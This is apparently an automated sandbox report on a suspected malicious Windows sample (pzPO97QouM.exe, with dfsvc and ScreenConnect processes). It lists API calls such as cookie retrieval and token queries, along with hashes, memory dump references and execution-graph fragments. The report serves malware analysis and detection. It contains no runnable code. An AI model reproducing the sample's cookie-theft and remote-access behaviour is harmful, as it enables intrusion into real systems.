                                                                                                                                                                                • Opcode Fuzzy Hash: 618c4d2d77783c8977bf7bf926b926e26ea57c49b7ab08877ad00f4388626e12
                                                                                                                                                                                • Instruction Fuzzy Hash: EBF0AF32A00604AF8660EB15F881C2A37ECBB50B263A80C05FA39CB452CA65FC84A650
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DAD
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DBF
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DD2
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DE3
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DF4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 85d31d7d54b0fc3dcbc6d80140d0b7116e3e4cc234b13ea8b91d5da26052f0c2
                                                                                                                                                                                • Instruction ID: 170258c8c1e3f8d8bc415abe4126dacd0c89a033584a610d307423c48c1444fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 85d31d7d54b0fc3dcbc6d80140d0b7116e3e4cc234b13ea8b91d5da26052f0c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 43F05E788046688FC7916F19FC114093B70BB5676630C0217FE329A3B2CBB51999BFC2
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pzPO97QouM.exe,00000104), ref: 00F52F93
                                                                                                                                                                                • _free.LIBCMT ref: 00F5305E
                                                                                                                                                                                • _free.LIBCMT ref: 00F53068
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                • API String ID: 2506810119-3153580935
                                                                                                                                                                                • Opcode ID: 25f60e68bb6f310b6cbdbea5c60cd7f19e809f8a501e0cd2028f805eda75e6c3
                                                                                                                                                                                • Instruction ID: 33755a12c1171924b7b89f33c2c6203349fc61ce3317d7ec1694399a4e09ce8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 25f60e68bb6f310b6cbdbea5c60cd7f19e809f8a501e0cd2028f805eda75e6c3
                                                                                                                                                                                • Instruction Fuzzy Hash: C731BD71E00308AFCB21DB99DC809AEBBFCEB85756F144066FE0497251D6B49A48EB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F52594,00000000,?,00F61B50,?,?,?,00F52737,00000004,InitializeCriticalSectionEx,00F5BC48,InitializeCriticalSectionEx), ref: 00F525F0
                                                                                                                                                                                • GetLastError.KERNEL32(?,00F52594,00000000,?,00F61B50,?,?,?,00F52737,00000004,InitializeCriticalSectionEx,00F5BC48,InitializeCriticalSectionEx,00000000,?,00F524C7), ref: 00F525FA
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F52622
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                • Opcode ID: 92be83f95160aea014da04fb2e304b8575bef41d69ee27c5aea80389b2c6cde1
                                                                                                                                                                                • Instruction ID: 13f4262fff7b361388cec706459cefceec0044b6614441535a10564922628bd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 92be83f95160aea014da04fb2e304b8575bef41d69ee27c5aea80389b2c6cde1
                                                                                                                                                                                • Instruction Fuzzy Hash: C9E04831640308BBDF111B60EC06F593F54AB11B63F104420FF0DE44E1E7A1E958B545
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue), ref: 00F5580F
                                                                                                                                                                                • GetLastError.KERNEL32(?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue,00F5C4D8,FlsSetValue,00000000,00000364,?,00F544F6), ref: 00F5581B
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue,00F5C4D8,FlsSetValue,00000000), ref: 00F55829
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: 1a1c51ccc4c09cae1422c535b69f172468eaf3b4abd6e45cb720a08d856fefbd
                                                                                                                                                                                • Instruction ID: 202971f2ec3f4ce2061cb0588ebad11d93f46b4271f54b3f5b206c662b6e2d08
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a1c51ccc4c09cae1422c535b69f172468eaf3b4abd6e45cb720a08d856fefbd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2101AC33A05B26EBC7214A68AC54A577798AF05FB37150524FF16D7180D720D808E6E0
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F54A27
                                                                                                                                                                                  • Part of subcall function 00F5474D: IsProcessorFeaturePresent.KERNEL32(00000017,00F5473C,00000000,?,00000004,00000000,?,?,?,?,00F54749,00000000,00000000,00000000,00000000,00000000), ref: 00F5474F
                                                                                                                                                                                  • Part of subcall function 00F5474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00F54771
                                                                                                                                                                                  • Part of subcall function 00F5474D: TerminateProcess.KERNEL32(00000000), ref: 00F54778
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                • Instruction ID: e1abc2c1664f5bff71158ee8a35d8f1713492ce29ec40c6fd5c12a4ab1c0d525
                                                                                                                                                                                • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                • Instruction Fuzzy Hash: 0851D371E00209AFDF14CFA8CC81AAEB7F4EF48319F244069EA54E7341E635AE45AB50

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:17.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:17
                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                execution_graph 39698 7ff848f2993b 39699 7ff848f29934 39698->39699 39699->39698 39700 7ff848f299fe CreateFileW 39699->39700 39701 7ff848f29a7c 39700->39701 39702 7ff848f2d792 39705 7ff848f2d7bf 39702->39705 39703 7ff848f2d92b InternetGetCookieW 39704 7ff848f2d989 39703->39704 39705->39703 39705->39705 39706 7ff848f5abd3 39707 7ff848f5abdf 39706->39707 39709 7ff848f5af32 39707->39709 39711 7ff848f21608 39707->39711 39710 7ff848f5b0f2 39713 7ff848f21611 39711->39713 39712 7ff848f21683 39712->39710 39713->39712 39714 7ff848f21802 LoadLibraryExW 39713->39714 39715 7ff848f21836 39714->39715 39715->39710
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookieInternet
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 930238652-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3918382513.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848e0d000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:14.4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 10479 7ff848f084b8 10480 7ff848f084bf SetProcessMitigationPolicy 10479->10480 10482 7ff848f08552 10480->10482 10483 7ff848f0f67b 10484 7ff848f0f687 CreateFileW 10483->10484 10486 7ff848f0f7bc 10484->10486 10487 7ff848f04880 10488 7ff848f04889 GetTokenInformation 10487->10488 10490 7ff848f1f2d7 10488->10490 10491 7ff848f03dfa 10492 7ff848f1f470 CloseHandle 10491->10492 10494 7ff848f1f4eb 10492->10494

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 192 7ff848f04880-7ff848f048d9 199 7ff848f048dc 192->199 199->199 200 7ff848f048de-7ff848f04949 199->200 208 7ff848f0494c 200->208 208->208 209 7ff848f0494e-7ff848f1f2d5 GetTokenInformation 208->209 215 7ff848f1f2dd-7ff848f1f30e 209->215 216 7ff848f1f2d7 209->216 216->215
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4114910276-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 218 7ff848f0f67b-7ff848f0f710 223 7ff848f0f71a-7ff848f0f7ba CreateFileW 218->223 224 7ff848f0f712-7ff848f0f717 218->224 226 7ff848f0f7bc 223->226 227 7ff848f0f7c2-7ff848f0f7f5 223->227 224->223 226->227
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 229 7ff848f084b8-7ff848f08550 SetProcessMitigationPolicy 232 7ff848f08558-7ff848f08587 229->232 233 7ff848f08552 229->233 233->232
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 235 7ff848f03eaa-7ff848f084ef 237 7ff848f084f6-7ff848f08550 SetProcessMitigationPolicy 235->237 238 7ff848f08558-7ff848f08587 237->238 239 7ff848f08552 237->239 239->238
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 339 7ff848f03dfa-7ff848f1f4e9 CloseHandle 342 7ff848f1f4eb 339->342 343 7ff848f1f4f1-7ff848f1f51f 339->343 342->343
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b4fd94f25b6f5729b351bcfcdd1e1d88c93be308bcff2d4b54eddcccbaecae5
                                                                                                                                                                                • Instruction ID: 9f17e16f3df352c255df3bd29786355f02a04669bc01c2e20b548d343ab76027
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4fd94f25b6f5729b351bcfcdd1e1d88c93be308bcff2d4b54eddcccbaecae5
                                                                                                                                                                                • Instruction Fuzzy Hash: E5416CB4600705CFCB24DF29D984A6ABBF5FF48B10B108A68D456D77A1EB34ED46CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8cdcbf08ed103a0ba1ed7b7c7bd8b1a1f326a4d9cb9f5898e14a7f88d30e1cd0
                                                                                                                                                                                • Instruction ID: 36ea49884204f4eff407706cc3d7e29b6f74a5821606fc6eae4ba315d2ba4492
                                                                                                                                                                                • Opcode Fuzzy Hash: 8cdcbf08ed103a0ba1ed7b7c7bd8b1a1f326a4d9cb9f5898e14a7f88d30e1cd0
                                                                                                                                                                                • Instruction Fuzzy Hash: 78319E31B102068BDB14DF69C494AAFFBF5EF89714F1484AAD406E73A4DB36DD018BA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1c1180daff9cc6709248fe743ce5c9cb8c506f4b2c8ea4cd403a3a6027e88281
                                                                                                                                                                                • Instruction ID: bea6c439b4fb1afafacb5502cc95c28a54c03f5874fc6f1b4dd695c4f3f8c02c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c1180daff9cc6709248fe743ce5c9cb8c506f4b2c8ea4cd403a3a6027e88281
                                                                                                                                                                                • Instruction Fuzzy Hash: B231BF70B042458FC705DB68C8546AEFFF6EFD9700B1480EAD949DB395DA359E02C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 482f568abee887d063222b254748f27e3afe4cf4adc4eb47356e949b1eae9f00
                                                                                                                                                                                • Instruction ID: 829d6bd6c22bcbc666c6ccea03b02f2227e367882dddbb8e387a8834f4f715fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 482f568abee887d063222b254748f27e3afe4cf4adc4eb47356e949b1eae9f00
                                                                                                                                                                                • Instruction Fuzzy Hash: F021F630B081858FC705DB68C8505AEFFF1EF8A710B1840E6D849DB3A2DB359E06C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bf0b91ea24deb2b4a85331d885c281788dd065619e2e646f83942de091f615c7
                                                                                                                                                                                • Instruction ID: c0b85e16e952f60f73e058e1d52f1fa48c4ddfa4992df272e8c851307ac28812
                                                                                                                                                                                • Opcode Fuzzy Hash: bf0b91ea24deb2b4a85331d885c281788dd065619e2e646f83942de091f615c7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B315C30600B058FC730DF29D888A6BB7F2EF99320B144A6DD496CB7A5D730E806CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce7f63c8de0c99514a3c4cb68b1994931d13a5cdebda09c5434b8c18789dcb2b
                                                                                                                                                                                • Instruction ID: 4fa07ad9396c002e47e74430f5222c8a8daada4db89747b77c97a2a5781cbb24
                                                                                                                                                                                • Opcode Fuzzy Hash: ce7f63c8de0c99514a3c4cb68b1994931d13a5cdebda09c5434b8c18789dcb2b
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D318231A0011ADFCF05DFA8D9509CDBBF2FF89314F148066D509BB261DB31A906CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03a56b3f767548489acbf368ea5db64c56cb6e6e672c7e9a963daeeef33d8c7e
                                                                                                                                                                                • Instruction ID: 8acbe23a9788f7e14a2497f6e609bf7e8ab4217b69ef3cd8f442770b5e3d6d45
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a56b3f767548489acbf368ea5db64c56cb6e6e672c7e9a963daeeef33d8c7e
                                                                                                                                                                                • Instruction Fuzzy Hash: C41121357002006BD704EB28E951B6E7FEAEFC0300F048466E909AB395EF30AD06CBE1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce9e4ca19e6383789c8083fd7e39f4ce8d295f237efd3a557054d018ee5b6bb6
                                                                                                                                                                                • Instruction ID: 5cd850e3a8657c444d3699649b16912356797a1107c226b5ff69805dee503a70
                                                                                                                                                                                • Opcode Fuzzy Hash: ce9e4ca19e6383789c8083fd7e39f4ce8d295f237efd3a557054d018ee5b6bb6
                                                                                                                                                                                • Instruction Fuzzy Hash: 90213E31200A058FD734DF29D848A96BBF5EF44320B148B6DD592976A1DB31E94ACF80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2b3ce6645280edbe6b83f8ae00ccbf37153237160b2859fbbec04bd66d8ab884
                                                                                                                                                                                • Instruction ID: 8224e6a73200b68578aa650e64eef22e2b5ab977d55298818927b7e94eac2470
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3ce6645280edbe6b83f8ae00ccbf37153237160b2859fbbec04bd66d8ab884
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D11E2357002045BD704EB6CE941B6EBBEAEFC4750F048929E905AB394EF30BE0587D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a872e2f82b3668aa90b0bf05b5b69cef7a6ad860dc39d0e35326b13e701b685e
                                                                                                                                                                                • Instruction ID: 6b8e779eff860610c384d066534fc03c4aaf7d8db874dff4d7bb6abcb572766a
                                                                                                                                                                                • Opcode Fuzzy Hash: a872e2f82b3668aa90b0bf05b5b69cef7a6ad860dc39d0e35326b13e701b685e
                                                                                                                                                                                • Instruction Fuzzy Hash: D5112975B093905FCB068B289C24457BFF9EF8521471486EBD845DF262DA75DD0AC780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
